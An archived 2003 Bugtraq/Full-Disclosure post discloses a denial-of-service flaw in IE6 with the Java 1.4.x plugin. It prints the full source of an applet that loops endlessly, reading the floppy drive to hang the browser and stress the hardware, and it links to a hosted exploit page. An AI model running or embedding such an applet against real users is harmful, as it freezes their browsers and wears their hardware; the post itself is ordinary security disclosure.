lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.A41.4.44.0310212242390.86414-100000@zivunix.uni-muenster.de>
Date: Tue, 21 Oct 2003 22:59:56 +0200 (MES)
From: Marc Schoenefeld <schonef@...-muenster.de>
To: bugtraq@...urityfocus.com, <full-disclosure@...ts.netsys.com>
Subject: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

be prepared that your IE6 will be blocked if you
run the java plugin (any 1.4.x including 1.4.2_02)
with the following applet:

http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html

Of course this only work when you have a drive a:.
Some may already know this applet but I found a way to
increase the frequency the floppy is accessed.
This is almost like the good old stepper motor
demo on the C1541 commodore drive, where the
floppy played a christmas song.

Sun has been informed about this issue over a week ago.
Since then I got no answer. Maybe they have no
floppy drives :-(

Here is the source:
import java.awt.Label;

public class MyFloppySucks extends java.applet.Applet {
	private Label m_labVersionVendor;
   public MyFloppySucks () //constructor
   {
     m_labVersionVendor = new Label ("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org" +" / Java Version: " +
                                    System.getProperty("java.version")+
                           " from "+System.getProperty("java.vendor"));
     this.add(m_labVersionVendor);
   }
   public void paint(java.awt.Graphics g) {
        while (1==1)
	   try {

org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/",false);
	}
	catch (Exception e) {
		System.out.println("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org");
	}
   }
}


Marc



- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE/lZ5PqCaQvrKNUNQRAle9AJ9DlTr9csO5s98FPNqlrOKDzHkEEwCfboj7
/AD6mnvFiHUendHDNlT+6js=
=N/UX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ